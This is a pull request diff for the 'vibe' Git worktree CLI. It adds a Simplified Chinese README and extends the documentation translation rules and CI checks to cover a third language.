### PR TITLE
docs: add Simplified Chinese translations

### DIFF
--- a/.claude/agents/vibe-legal-expert.md
+++ b/.claude/agents/vibe-legal-expert.md
@@ -10,7 +10,7 @@ description: >-
   dependencies, updating versions, reviewing Dependabot PRs, or auditing license
   compliance.
 tools: Read, Glob, Grep, Bash, WebFetch
-model: sonnet
+model: opus
 color: yellow
 ---
 

--- a/.claude/rules/docs-i18n.md
+++ b/.claude/rules/docs-i18n.md
@@ -6,10 +6,12 @@ globs: "packages/docs/src/content/docs/**/*.mdx"
 
 ## Directory Structure
 
-- `packages/docs/src/content/docs/*.mdx` - English version (default)
+- `packages/docs/src/content/docs/*.mdx` - English version (default, Starlight `root` locale)
 - `packages/docs/src/content/docs/ja/*.mdx` - Japanese version
+- `packages/docs/src/content/docs/zh/*.mdx` - Simplified Chinese version
 
-The Japanese version mirrors the English directory structure under the `ja/` subdirectory:
+Each translated locale mirrors the English directory structure under its own
+subdirectory:
 
 ```
 packages/docs/src/content/docs/
@@ -18,39 +20,58 @@ packages/docs/src/content/docs/
 ├── commands/
 │   ├── start.mdx
 │   └── clean.mdx
-└── ja/
-    ├── changelog.mdx          ← Japanese
+├── ja/
+│   ├── changelog.mdx          ← Japanese
+│   ├── getting-started.mdx
+│   └── commands/
+│       ├── start.mdx
+│       └── clean.mdx
+└── zh/
+    ├── changelog.mdx          ← Simplified Chinese
     ├── getting-started.mdx
     └── commands/
         ├── start.mdx
         └── clean.mdx
 ```
 
+The locales themselves are declared in `packages/docs/astro.config.ts`
+(`locales` + the per-entry `sidebar` `translations`); adding a locale directory
+without registering it there leaves the pages unreachable from the language
+picker.
+
 ## Synchronization Requirements
 
-When modifying any `.mdx` file under `packages/docs/src/content/docs/`, **always update its counterpart**:
+When modifying any `.mdx` file under `packages/docs/src/content/docs/`, **always update its counterparts in the other two locales**:
 
-1. **Editing an English file** → Update the corresponding `ja/` file
-2. **Editing a Japanese file** → Update the corresponding English file
-3. **Creating a new English file** → Also create the `ja/` version with Japanese translation
-4. **Deleting a file** → Delete both versions
+1. **Editing an English file** → Update the corresponding `ja/` and `zh/` files
+2. **Editing a translated file** → Update the English file and the remaining translation
+3. **Creating a new English file** → Also create the `ja/` and `zh/` versions with translations
+4. **Deleting a file** → Delete all three versions
+
+`pnpm run check:i18n` (`just check-i18n`) asserts that the three sets of
+relative paths are identical, so an unmirrored page fails CI.
 
 ## Path Mapping
 
-| English                                     | Japanese                                       |
-| ------------------------------------------- | ---------------------------------------------- |
-| `packages/docs/src/content/docs/<path>.mdx` | `packages/docs/src/content/docs/ja/<path>.mdx` |
+| English                                     | Japanese                                       | Simplified Chinese                             |
+| ------------------------------------------- | ---------------------------------------------- | ---------------------------------------------- |
+| `packages/docs/src/content/docs/<path>.mdx` | `packages/docs/src/content/docs/ja/<path>.mdx` | `packages/docs/src/content/docs/zh/<path>.mdx` |
 
 Examples:
 
-- `changelog.mdx` ↔ `ja/changelog.mdx`
-- `commands/start.mdx` ↔ `ja/commands/start.mdx`
-- `configuration/hooks.mdx` ↔ `ja/configuration/hooks.mdx`
+- `changelog.mdx` ↔ `ja/changelog.mdx` ↔ `zh/changelog.mdx`
+- `commands/start.mdx` ↔ `ja/commands/start.mdx` ↔ `zh/commands/start.mdx`
+- `configuration/hooks.mdx` ↔ `ja/configuration/hooks.mdx` ↔ `zh/configuration/hooks.mdx`
 
 ## Translation Guidelines
 
 - Translate content naturally, not word-for-word
 - Keep code blocks, CLI commands, file paths, and technical terms unchanged
-- Dates: English uses `YYYY-MM-DD`, Japanese uses `YYYY年M月D日`
+- Dates: English uses `YYYY-MM-DD`, Japanese uses `YYYY年M月D日`, Simplified
+  Chinese uses `YYYY年M月D日`
+- Chinese translations use **Simplified Chinese (zh-CN)** and mainland
+  conventions; do not mix in Japanese kanji forms or Traditional Chinese
 - Frontmatter `title` and `description` should be translated
+- Sidebar labels live in `astro.config.ts`, not in the frontmatter: a new sidebar
+  entry needs `translations: { ja: "…", zh: "…" }`
 - Keep Mermaid diagrams identical (node labels can be translated if needed)

--- a/.claude/rules/markdown.md
+++ b/.claude/rules/markdown.md
@@ -8,22 +8,45 @@ globs: "**/*.md"
 
 - `*.md` - English version (default)
 - `*.ja.md` - Japanese version
+- `*.zh.md` - Simplified Chinese version
+
+A translated document always forms a **triplet**: `example.md`, `example.ja.md`,
+and `example.zh.md`. A file with no `.ja.md`/`.zh.md` sibling (e.g. `AGENTS.md`)
+is simply untranslated and outside these rules; once any translation exists, all
+three must exist.
 
 ## Cross-Language Links
 
-Each markdown file must include a link to its counterpart at the top:
+Each markdown file must link to its two counterparts at the top, in a single
+line listing the other languages separated by ` | `:
 
-- **English version** (`*.md`): Add `> 🇯🇵 [日本語版](./filename.ja.md)` at the top
-- **Japanese version** (`*.ja.md`): Add `> 🇺🇸 [English](./filename.md)` at the top
+- **English version** (`*.md`): `> 🇯🇵 [日本語版](./filename.ja.md) | 🇨🇳 [简体中文](./filename.zh.md)`
+- **Japanese version** (`*.ja.md`): `> 🇺🇸 [English](./filename.md) | 🇨🇳 [简体中文](./filename.zh.md)`
+- **Chinese version** (`*.zh.md`): `> 🇺🇸 [English](./filename.md) | 🇯🇵 [日本語版](./filename.ja.md)`
+
+The link line must appear within the first 5 lines of the file. Some documents
+use an equivalent variant of this line (a `> [!NOTE]` callout, GitHub `:jp:` /
+`:us:` / `:cn:` emoji shortcodes, or a bare link line without the blockquote);
+keep the existing style of the file you are editing and just add the missing
+language to it. Whatever the styling, all links to the other two languages must
+be present.
 
 ## Synchronization Requirements
 
-When creating or modifying markdown files, ensure both language versions are kept in sync:
+When creating or modifying markdown files, ensure all three language versions
+are kept in sync:
 
-1. **Creating a new file**: If you create `example.md`, also create `example.ja.md` with Japanese translation
-2. **Modifying content**: When updating `example.md`, also update `example.ja.md` to reflect the same changes
-3. **Structural consistency**: Both versions must have the same structure (headings, sections, lists)
-4. **Cross-language links**: Both versions must have links to each other at the top
+1. **Creating a new file**: If you create `example.md`, also create
+   `example.ja.md` and `example.zh.md` with the corresponding translations
+2. **Modifying content**: When updating any one version, update the other two to
+   reflect the same changes
+3. **Structural consistency**: All three versions must have the same structure
+   (headings, sections, lists)
+4. **Cross-language links**: Every version must link to the other two at the top
+5. **Deleting a file**: Delete all three versions
+
+`pnpm run check:i18n` (`just check-i18n`) enforces requirements 1, 4 and 5
+mechanically; it is wired into `check:all` and CI.
 
 ## Diagrams
 
@@ -52,8 +75,11 @@ flowchart TD
 
 - Translate content naturally, not word-for-word
 - Keep code blocks, file paths, and technical terms unchanged
-- Dates: English uses `YYYY-MM-DD`, Japanese uses `YYYY年M月D日`
-- **Diagrams**: Keep Mermaid diagrams identical in both versions (node labels can be translated if needed). For ASCII art diagrams, keep text in English and provide translations in a separate table below
+- Dates: English uses `YYYY-MM-DD`, Japanese uses `YYYY年M月D日`, Simplified
+  Chinese uses `YYYY年M月D日`
+- Chinese translations use **Simplified Chinese (zh-CN)** and mainland
+  conventions; do not mix in Japanese kanji forms or Traditional Chinese
+- **Diagrams**: Keep Mermaid diagrams identical in all versions (node labels can be translated if needed). For ASCII art diagrams, keep text in English and provide translations in a separate table below
 
 ## Exceptions
 

--- a/.gitattributes
+++ b/.gitattributes
@@ -1,0 +1,14 @@
+# Legal documents are compared byte-for-byte, so their line endings must not
+# depend on the checkout.
+#
+# scripts/generate-third-party-licenses.ts --check compares the file it would
+# generate against the committed one, and scripts/build-deb.ts derives the .deb
+# copyright body from LICENSE. On a Windows runner with core.autocrlf=true both
+# would be checked out with CRLF, making --check report a false "stale" and the
+# generated document differ from the committed one for no real reason.
+#
+# Why not `* text=auto eol=lf` for the whole repo: nothing else here is compared
+# byte-for-byte, and a repo-wide normalization would rewrite files (including
+# test fixtures) well outside the problem this pins down.
+THIRD-PARTY-LICENSES.md text eol=lf
+LICENSE text eol=lf

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -30,6 +30,17 @@ jobs:
         run: bun run fmt:check
       - name: Run linter
         run: bun run lint
+      # The npm-package tests (launcher shim + the release/packaging scripts)
+      # otherwise run only in publish-npm.yml, i.e. after the merge that would
+      # have broken them. This job already has pnpm install, so they gate the PR.
+      - name: Run npm package tests
+        run: pnpm run test:npm
+      # THIRD-PARTY-LICENSES.md freshness + the `ring` link guard. Needs cargo
+      # (cargo metadata / cargo tree), which setup-toolchain provides here.
+      # publish-npm.yml also runs --check, but only immediately before publish —
+      # too late to be a PR gate.
+      - name: Check third-party license notices
+        run: pnpm run check:licenses
 
   rust-linux:
     if: github.event_name == 'push' || github.base_ref == 'main'
@@ -172,6 +183,15 @@ jobs:
         run: |
           VERSION=$(bun run scripts/get-version.ts)
           bun run scripts/build-deb.ts "$VERSION" ${{ matrix.arch }} "rust/target/${{ matrix.target }}/release/vibe"
+
+      # Inspect the archive (no install, no sudo): a package that drops
+      # usr/share/doc/vibe/copyright or THIRD-PARTY-LICENSES.md still passes the
+      # smoke test below, so the contents are asserted separately.
+      - name: Verify .deb contents
+        run: |
+          set -euo pipefail
+          VERSION=$(bun run scripts/get-version.ts)
+          bun run scripts/verify-deb.ts "vibe_${VERSION}_${{ matrix.arch }}.deb"
 
       # G-11: install the freshly built .deb and run the installed binary, so a
       # broken package layout (wrong install path, missing exec bit, bad control

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -30,6 +30,13 @@ jobs:
         run: bun run fmt:check
       - name: Run linter
         run: bun run lint
+      # Documentation i18n (en/ja/zh): triplet completeness, docs-site locale
+      # mirroring, and cross-language header links. Pure filesystem inspection —
+      # no cargo, no build — so it belongs in the cheap lint job rather than the
+      # docs job, which is skipped when nothing under packages/docs/ changed and
+      # would therefore miss a root README/docs translation going stale.
+      - name: Check documentation i18n sync
+        run: pnpm run check:i18n
       # The npm-package tests (launcher shim + the release/packaging scripts)
       # otherwise run only in publish-npm.yml, i.e. after the merge that would
       # have broken them. This job already has pnpm install, so they gate the PR.

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -243,6 +243,17 @@ jobs:
           chmod +x "$BINARY"
           bun run scripts/build-deb.ts "$VERSION" "$ARCH" "$BINARY"
 
+      # Inspect the archive before it becomes a release asset: the .deb must
+      # carry usr/share/doc/vibe/copyright and THIRD-PARTY-LICENSES.md, neither
+      # of which any other release check would notice missing.
+      - name: Verify .deb contents
+        env:
+          ARCH: ${{ matrix.arch }}
+          VERSION: ${{ needs.prepare.outputs.version }}
+        run: |
+          set -euo pipefail
+          bun run scripts/verify-deb.ts "vibe_${VERSION}_${ARCH}.deb"
+
       - name: Upload .deb artifact
         uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7.0.1
         with:

--- a/README.ja.md
+++ b/README.ja.md
@@ -2,7 +2,7 @@
 
 Git Worktreeを簡単かつ超高速に管理するCLIツール。
 
-[English](README.md)
+[English](README.md) | [简体中文](README.zh.md)
 
 ## ドキュメント
 

--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 A super fast CLI tool for easy Git Worktree management.
 
-[日本語](README.ja.md)
+[日本語](README.ja.md) | [简体中文](README.zh.md)
 
 ## Documentation
 

--- a/README.zh.md
+++ b/README.zh.md
@@ -1,0 +1,639 @@
+# vibe
+
+一款用于轻松管理 Git Worktree 的超快 CLI 工具。
+
+> 🇺🇸 [English](./README.md) | 🇯🇵 [日本語版](./README.ja.md)
+
+## 文档
+
+📚 完整文档请访问 [vibe.kexi.dev](https://vibe.kexi.dev)
+
+## 使用方法
+
+| 命令                               | 说明                                                         |
+| ---------------------------------- | ------------------------------------------------------------ |
+| `vibe start <branch> [options]`    | 使用新分支或已有分支创建 worktree（幂等）                    |
+| `vibe scratch [options]`           | 创建自动命名为 `scratch/<timestamp>` 分支的 worktree         |
+| `vibe jump <branch> [options]`     | 按分支名跳转到已有 worktree（支持部分匹配与模糊匹配）        |
+| `vibe rename <new-name> [options]` | 重命名当前 worktree 的分支和目录                             |
+| `vibe clean [options]`             | 删除当前 worktree 并返回主仓库（存在未提交更改时会提示确认） |
+| `vibe home`                        | 不删除当前 worktree，直接返回主 worktree                     |
+| `vibe trust`                       | 信任 `.vibe.toml` 和 `.vibe.local.toml` 文件                 |
+| `vibe untrust`                     | 取消信任 `.vibe.toml` 和 `.vibe.local.toml` 文件             |
+| `vibe verify`                      | 查看信任状态与哈希历史                                       |
+| `vibe config`                      | 显示当前设置                                                 |
+| `vibe upgrade [options]`           | 检查更新并显示升级方法                                       |
+
+### 示例
+
+```bash
+# 使用新分支创建 worktree
+vibe start feat/new-feature
+
+# 使用已有分支（或在 worktree 已存在时重复执行）
+vibe start feat/existing-branch
+
+# 从指定的基准分支创建 worktree
+vibe start feat/new-feature --base main
+
+# 跳转到已有 worktree（完全匹配、部分匹配或模糊匹配）
+vibe jump feat/new-feature
+vibe jump login
+vibe jump feli  # 模糊匹配到 "feat/login"
+
+# 无需起名即可创建临时 worktree（自动命名：scratch/<timestamp>）
+vibe scratch
+
+# 将当前的 scratch 提升为正式名称
+vibe rename my-feature
+
+# 工作完成后删除 worktree
+vibe clean
+
+# 不删除当前 worktree，直接返回主 worktree
+vibe home
+```
+
+### 交互式提示
+
+`vibe start` 会处理以下情况：
+
+- **分支已被其他 worktree 占用时**：确认是否跳转到已有的 worktree
+- **相同的 worktree 已存在时**：自动复用（幂等）
+- **目录已存在但分支不同时**：可从以下选项中选择
+  - 覆盖（删除后重新创建）
+  - 复用（使用已有目录）
+  - 取消
+
+```bash
+# 分支已被占用时的示例
+$ vibe start feat/new-feature
+Branch 'feat/new-feature' is already in use by worktree '/path/to/repo-feat-new-feature'.
+Navigate to the existing worktree? (Y/n)
+```
+
+### 基准分支选项
+
+`--base` 选项用于指定新分支的起点：
+
+- **新分支**：从指定的基准（分支、标签或提交）创建分支
+- **已有分支**：`--base` 选项将被忽略并给出警告
+- **无效的基准**：如果指定的引用不存在，则以错误退出
+
+默认情况下，`--base` **不会**设置上游跟踪。如需显式设置上游，请使用 `--track`：
+
+```bash
+# 不设置上游跟踪（默认）
+vibe start feat/new-feature --base origin/develop
+
+# 设置上游跟踪
+vibe start feat/new-feature --base origin/develop --track
+```
+
+### 清理行为
+
+`vibe clean` 采用快速删除策略：移动 worktree 目录，而不是同步删除它：
+
+- **macOS**：通过 Finder 将条目移入系统废纸篓（需要时可恢复）
+- **Linux**：将条目移入 XDG 回收站（可从文件管理器恢复）
+- **Windows**：将条目移入回收站（需要时可恢复）
+
+这种方式使 `vibe clean` 无论 worktree 有多大都能瞬间完成。
+
+### 全局选项
+
+| 选项              | 说明           |
+| ----------------- | -------------- |
+| `-h`, `--help`    | 显示帮助信息   |
+| `-v`, `--version` | 显示版本信息   |
+| `-V`, `--verbose` | 显示详细输出   |
+| `-q`, `--quiet`   | 抑制非必要输出 |
+
+### 命令选项
+
+#### Start 选项
+
+| 选项              | 说明                                                       |
+| ----------------- | ---------------------------------------------------------- |
+| `--base <ref>`    | 新分支的基准分支/提交                                      |
+| `--track`         | 使用 `--base` 时设置上游跟踪                               |
+| `--no-hooks`      | 跳过 pre-start 与 post-start 钩子                          |
+| `--no-copy`       | 跳过文件和目录的复制                                       |
+| `-n`, `--dry-run` | 只显示将要执行的操作，不做实际更改                         |
+| `-f`, `--force`   | 跳过提示：跳转到已有分支的 worktree，或覆盖冲突的 worktree |
+
+#### Clean 选项
+
+| 选项              | 说明                         |
+| ----------------- | ---------------------------- |
+| `-f`, `--force`   | 跳过确认提示                 |
+| `--delete-branch` | 删除 worktree 后同时删除分支 |
+| `--keep-branch`   | 删除 worktree 后保留分支     |
+
+#### Upgrade 选项
+
+| 选项      | 说明                       |
+| --------- | -------------------------- |
+| `--check` | 仅检查更新，不显示升级方法 |
+
+## 安装
+
+### Homebrew (macOS)
+
+```bash
+brew install kexi/tap/vibe
+```
+
+### Homebrew Beta (macOS)
+
+用于测试最新的开发版本：
+
+```bash
+brew install kexi/tap/vibe-beta
+```
+
+> ⚠️ **警告**：Beta 版本基于 `develop` 分支构建，可能包含不稳定的功能。请仅用于测试。
+
+### npm (Node.js 18+)
+
+```bash
+# 全局安装
+npm install -g @kexi/vibe
+
+# 或使用 npx 直接运行
+npx @kexi/vibe start feat/my-feature
+```
+
+> 注意：npm 包只是一个轻量启动器，用于运行适配你所在平台的原生 `vibe` 二进制文件（作为按平台划分的 `optionalDependency` 自动安装，例如 `@kexi/vibe-darwin-arm64`）。macOS (APFS) 与 Linux (Btrfs/XFS) 上经过优化的 Copy-on-Write 文件克隆功能已直接内置于该二进制文件中。
+
+### Bun (1.2.0+)
+
+```bash
+# 全局安装
+bun add -g @kexi/vibe
+
+# 或使用 bunx 直接运行
+bunx @kexi/vibe start feat/my-feature
+```
+
+> 注意：Bun 使用与 Node.js 相同的 npm 包 —— 它同样会启动适配你所在平台的原生 `vibe` 二进制文件。
+
+### mise
+
+添加到你的 `.mise.toml`：
+
+```toml
+[plugins]
+vibe = "https://github.com/kexi/mise-vibe"
+
+[tools]
+vibe = "latest"
+```
+
+然后运行：
+
+```bash
+mise install
+```
+
+#### 使用 mise hooks 配置 shell
+
+如果你使用 [`mise activate`](https://mise.jdx.dev/getting-started.html#activate-mise)，
+可以添加 `[hooks]` 来跳过[手动 shell 配置](#shell-配置)：
+
+```toml
+[hooks]
+enter = 'eval "$(vibe shell-setup)"'
+```
+
+### Nix
+
+```bash
+# 直接运行（临时）
+nix run github:kexi/vibe -- start feat/my-feature
+
+# 持久化安装
+nix profile install github:kexi/vibe
+```
+
+> 注意：Nix 包会安装来自 GitHub Releases 的预构建二进制文件，并通过 SHA-256 哈希进行校验。
+
+### Linux
+
+> **注意**：WSL2 用户可以根据自己的发行版使用下面的 Linux 安装方式。
+
+#### Ubuntu/Debian (.deb 包)
+
+```bash
+# x64
+curl -LO https://github.com/kexi/vibe/releases/latest/download/vibe_amd64.deb
+sudo apt install ./vibe_amd64.deb
+
+# ARM64
+curl -LO https://github.com/kexi/vibe/releases/latest/download/vibe_arm64.deb
+sudo apt install ./vibe_arm64.deb
+
+# 卸载
+sudo apt remove vibe
+```
+
+#### 其他 Linux 发行版
+
+```bash
+# x64
+curl -L https://github.com/kexi/vibe/releases/latest/download/vibe-linux-x64 -o vibe
+chmod +x vibe
+sudo mv vibe /usr/local/bin/
+
+# ARM64
+curl -L https://github.com/kexi/vibe/releases/latest/download/vibe-linux-arm64 -o vibe
+chmod +x vibe
+sudo mv vibe /usr/local/bin/
+```
+
+### Windows
+
+vibe 支持 Windows (x64)。通过 npm 安装即可 —— `@kexi/vibe` 启动器会自动引入
+适配你所在平台的二进制包 `@kexi/vibe-win32-x64`：
+
+```bash
+npm install -g @kexi/vibe
+```
+
+> [!NOTE]
+> Windows 上无法使用 Copy-on-Write 克隆，创建 worktree 时 vibe 会回退到
+> 标准文件复制。除此之外的功能与 Linux、macOS 上完全一致。你也可以在
+> [WSL2](https://learn.microsoft.com/windows/wsl/) 中按照上面的 Linux 步骤
+> 运行 vibe（如果想在 Btrfs 卷上使用 Copy-on-Write，这会很有用），或者使用
+> Rust 工具链从源码构建（参见[手动构建](#手动构建)）。
+
+### 手动构建
+
+```bash
+cargo build --manifest-path rust/Cargo.toml -p vibe --release
+# 二进制文件位于：rust/target/release/vibe
+```
+
+## Shell 配置
+
+请将以下内容添加到你的 shell 配置文件中：
+
+<details>
+<summary>Zsh (.zshrc)</summary>
+
+```bash
+vibe() { eval "$(command vibe "$@")" }
+```
+
+</details>
+
+<details>
+<summary>Bash (.bashrc)</summary>
+
+```bash
+vibe() { eval "$(command vibe "$@")"; }
+```
+
+</details>
+
+<details>
+<summary>Fish (~/.config/fish/config.fish)</summary>
+
+```fish
+function vibe
+    eval (command vibe $argv)
+end
+```
+
+</details>
+
+<details>
+<summary>Nushell (~/.config/nushell/config.nu)</summary>
+
+```nu
+def --env --wrapped vibe [...args] {
+    let out = (^vibe --eval-dialect nu ...$args)
+    for line in ($out | lines) {
+        if ($line | str starts-with "__VIBE_CD__") {
+            cd ($line | str replace "__VIBE_CD__" "")
+        } else {
+            print $line
+        }
+    }
+}
+```
+
+需要 vibe 2.2.0 或更高版本，以及 nushell 0.83 或更高版本。请替换掉之前粘贴的旧版
+`nu -c` 代码片段 —— 它实际上并不会切换目录，而且会拒绝任何带有 flag 的命令。请同时保留
+`--wrapped`（以便 flag 能传递给 `...args`）和 `for`（因为 nushell 会丢弃在 `each`
+闭包内所做的环境变更）。
+
+</details>
+
+<details>
+<summary>PowerShell ($PROFILE)</summary>
+
+```powershell
+function vibe { $out = & vibe.exe --eval-dialect powershell @args; if ($out) { Invoke-Expression ($out -join "`n") } }
+```
+
+需要 vibe 2.2.0 或更高版本。请替换掉之前粘贴的旧版
+`Invoke-Expression (& vibe.exe $args)` 代码片段 —— 它无法正确处理包含单引号的路径，
+并且在 vibe 没有任何输出时会抛出错误。
+
+</details>
+
+## 配置
+
+### .vibe.toml
+
+在仓库根目录放置 `.vibe.toml` 文件，即可在执行 `vibe start` 时自动运行任务。
+该文件通常会提交到 git 并与团队共享。
+
+```toml
+# 将文件和目录从原始仓库复制到 worktree
+[copy]
+files = [".env"]
+dirs = ["node_modules", ".cache"]
+
+# worktree 创建后要执行的命令
+[hooks]
+pre_start = ["echo 'Preparing worktree...'"]
+post_start = [
+  "pnpm install",
+  "pnpm db:migrate"
+]
+pre_clean = ["git stash"]
+post_clean = ["echo 'Cleanup complete'"]
+```
+
+首次使用时需要通过 `vibe trust` 进行信任登记。
+
+#### Copy 配置中的 Glob 模式
+
+`files` 数组支持 glob 模式，可灵活地选择文件：
+
+```toml
+[copy]
+files = [
+  "*.env",              # 根目录下的所有 .env 文件
+  "**/*.json",          # 递归匹配所有 JSON 文件
+  "config/*.txt",       # config/ 下的所有 .txt 文件
+  ".env.production"     # 精确路径同样可用
+]
+```
+
+**支持的模式：**
+
+- `*` - 匹配除 `/` 以外的任意字符
+- `**` - 匹配包括 `/` 在内的任意字符（递归）
+- `?` - 匹配任意单个字符
+- `[abc]` - 匹配方括号中的任意一个字符
+
+**注意事项：**
+
+- 复制匹配到的文件时会保留目录结构
+- 递归模式（`**/*`）在大型仓库中可能较慢
+  - 尽可能使用更具体的模式（例如用 `config/**/*.json` 代替 `**/*.json`）
+  - 模式展开只在创建 worktree 时执行一次，而不是每次执行命令都展开
+
+#### 目录复制配置
+
+`dirs` 数组会递归复制整个目录：
+
+```toml
+[copy]
+dirs = [
+  "node_modules",      # 精确的目录路径
+  ".cache",            # 隐藏目录
+  "packages/*"         # 匹配多个目录的 Glob 模式
+]
+```
+
+**注意事项：**
+
+- 目录会被完整复制（而非增量同步）
+- Glob 模式的行为与文件模式一致
+- 像 `node_modules` 这样的大目录复制起来可能比较耗时
+
+#### 复制性能优化
+
+Vibe 会根据你的系统自动选择最佳的复制策略：
+
+| 策略            | 使用条件                    | 平台        |
+| --------------- | --------------------------- | ----------- |
+| Clone (CoW)     | APFS 上的原生 clonefile()   | macOS       |
+| Clone (reflink) | Btrfs/XFS 上的目录复制      | Linux       |
+| rsync           | 无法使用 clone 时的目录复制 | macOS/Linux |
+| Standard        | 文件复制，或作为兜底方案    | 全部        |
+
+**工作原理：**
+
+- **文件复制**：始终使用原生的 `copyFile()`，以获得最佳的单文件性能
+- **目录复制**：自动使用当前可用的最快方式：
+  - 在使用 APFS 的 macOS 上：使用原生 `clonefile()` 系统调用（已内置于二进制文件中）实现瞬时 CoW 克隆。如果不可用，则回退到 `cp -cR`
+  - 在使用 Btrfs/XFS 的 Linux 上：使用 `cp --reflink=auto` 进行 CoW 克隆
+  - 如果 CoW 不可用，则回退到 rsync 或标准复制
+
+**优势：**
+
+- Copy-on-Write 只复制元数据而非实际数据，因此速度极快
+- 无需配置 —— 最佳策略会被自动检测
+- 自动回退机制确保复制始终可用
+
+关于复制策略与实现的详细说明，请参见 [Copy Strategies](docs/specifications/copy-strategies.zh.md)。
+
+### Worktree 路径配置
+
+可以使用外部脚本自定义 worktree 的目录路径：
+
+```toml
+[worktree]
+path_script = "~/.config/vibe/worktree-path.sh"
+```
+
+该脚本会接收以下环境变量，并且需要输出一个绝对路径：
+
+| 变量                    | 说明                        | 示例               |
+| ----------------------- | --------------------------- | ------------------ |
+| `VIBE_REPO_NAME`        | 仓库名                      | `my-project`       |
+| `VIBE_BRANCH_NAME`      | 分支名                      | `feat/new-feature` |
+| `VIBE_SANITIZED_BRANCH` | 净化后的分支名（`/` → `-`） | `feat-new-feature` |
+| `VIBE_REPO_ROOT`        | 仓库根目录路径              | `/path/to/repo`    |
+
+**脚本示例：**
+
+```bash
+#!/bin/bash
+echo "${HOME}/worktrees/${VIBE_REPO_NAME}-${VIBE_SANITIZED_BRANCH}"
+```
+
+### 编辑器支持 (JSON Schema)
+
+Vibe 为 `settings.json` 提供了 JSON Schema，可实现自动补全与校验。当 vibe 保存设置文件时会**自动添加** `$schema` 属性。大多数现代编辑器（VS Code、IntelliJ 等）都会自动提供补全功能。
+
+关于 VS Code 的手动配置，请参见 [settings.json 文档](https://vibe.kexi.dev/configuration/settings/#json-schema)。
+
+### 安全性：哈希校验
+
+Vibe 会使用 SHA-256 哈希自动校验 `.vibe.toml` 与 `.vibe.local.toml` 文件的完整性，从而防止配置文件被未经授权地修改。
+
+#### 工作原理
+
+- 当你执行 `vibe trust` 时，Vibe 会计算并保存配置文件的 SHA-256 哈希
+- 当你执行 `vibe start` 时，Vibe 会通过校验哈希来确认文件未被修改
+- 如果哈希不匹配，Vibe 会以错误退出，并要求你重新执行 `vibe trust`
+
+#### 跳过哈希校验（用于开发）
+
+你可以在设置文件（`~/.config/vibe/settings.json`）中禁用哈希校验：
+
+**全局设置：**
+
+```json
+{
+  "version": 3,
+  "skipHashCheck": true,
+  "permissions": { "allow": [], "deny": [] }
+}
+```
+
+**按文件设置：**
+
+```json
+{
+  "version": 3,
+  "permissions": {
+    "allow": [
+      {
+        "repoId": {
+          "remoteUrl": "github.com/user/repo",
+          "repoRoot": "/path/to/repo"
+        },
+        "relativePath": ".vibe.toml",
+        "hashes": ["abc123..."],
+        "skipHashCheck": true
+      }
+    ],
+    "deny": []
+  }
+}
+```
+
+> **注意**：版本 3 使用基于仓库的信任标识。设置会在首次加载时自动从 v2 迁移到 v3。信任信息在同一仓库的所有 worktree 之间共享。
+
+#### 切换分支
+
+Vibe 会为每个文件保存多个哈希（最多 100 个），因此只要你为每个分支的版本各信任过一次，就可以在分支之间自由切换而无需重新信任。
+
+#### 安全性注意事项
+
+信任机制会校验配置文件在你信任之后是否被修改过。但请注意以下几点：
+
+- **信任是一种意愿声明**：执行 `vibe trust` 即表示你声明已经审阅并批准了这些配置文件，包括其中包含的所有钩子命令。
+- **钩子会执行任意命令**：在 `hooks.pre_start`、`hooks.post_start` 等中定义的命令会在你的 shell 中执行。Vibe 不会对这些命令做沙箱隔离或功能限制。
+- **信任前请先审阅**：在执行 `vibe trust` 之前，请务必审阅 `.vibe.toml` 与 `.vibe.local.toml` 文件，尤其是在你无法掌控的仓库中。
+- **哈希校验不是恶意软件防护**：哈希校验只能检测你已信任的文件是否发生了变化，并不会评估命令本身是否安全。
+
+### .vibe.local.toml
+
+创建 `.vibe.local.toml` 文件可以进行仅在本地生效、不会提交到 git 的配置覆盖
+（会被自动 gitignore）。这对于开发者个人的专属设置非常有用。
+
+```toml
+# 用本地命令覆盖或扩展共享钩子
+[hooks]
+post_start_prepend = ["echo 'Local setup starting'"]
+post_start_append = ["npm run dev"]
+
+# 覆盖要复制的文件
+[copy]
+files = [".env.local", ".secrets"]
+```
+
+### 配置合并
+
+当 `.vibe.toml` 与 `.vibe.local.toml` 同时存在时：
+
+- **完全覆盖**：直接使用字段名（例如 `post_start = [...]`）
+- **在前面插入**：使用 `_prepend` 后缀（例如 `post_start_prepend = [...]`）
+- **在后面追加**：使用 `_append` 后缀（例如 `post_start_append = [...]`）
+
+**示例：**
+
+```toml
+# .vibe.toml（共享）
+[hooks]
+post_start = ["npm install", "npm run build"]
+
+# .vibe.local.toml（本地）
+[hooks]
+post_start_prepend = ["echo 'local setup'"]
+post_start_append = ["npm run dev"]
+
+# 结果：["echo 'local setup'", "npm install", "npm run build", "npm run dev"]
+```
+
+### 可用的钩子
+
+| 钩子         | 执行时机                              | 可用的环境变量                           |
+| ------------ | ------------------------------------- | ---------------------------------------- |
+| `pre_start`  | worktree 创建前                       | `VIBE_WORKTREE_PATH`, `VIBE_ORIGIN_PATH` |
+| `post_start` | worktree 创建后                       | `VIBE_WORKTREE_PATH`, `VIBE_ORIGIN_PATH` |
+| `pre_clean`  | worktree 删除前（在当前 worktree 中） | `VIBE_WORKTREE_PATH`, `VIBE_ORIGIN_PATH` |
+| `post_clean` | worktree 删除后（在主仓库中）         | `VIBE_WORKTREE_PATH`, `VIBE_ORIGIN_PATH` |
+
+**注意**：`post_clean` 钩子会通过 `&&` 连接到删除命令之后，在 `git worktree remove` 命令执行完毕后于主仓库目录中运行。
+
+### 钩子输出行为
+
+Vibe 会在钩子执行期间显示实时进度树来展示任务状态。钩子的输出会根据不同场景以不同方式处理：
+
+- **进度显示处于激活状态时**：钩子的标准输出会被抑制，以保持进度树整洁、避免视觉干扰。此时只显示进度树。
+- **进度显示未激活时**：钩子的标准输出会被写入标准错误输出（以免干扰 shell 包装函数的 `eval`）。
+- **失败的钩子**：无论进度显示是否激活，标准错误输出都**始终**会被展示，以便于调试。
+
+进度显示示例：
+
+```
+✶ Setting up worktree feature/new-ui…
+┗ ☒ Pre-start hooks
+   ┗ ☒ npm install
+     ☒ cargo build --release
+  ⠋ Copying files
+   ┗ ⠋ .env.local
+     ☐ node_modules/
+```
+
+**注意**：在非 TTY 环境（例如 CI/CD）中进度显示会自动关闭，钩子输出将正常展示。
+
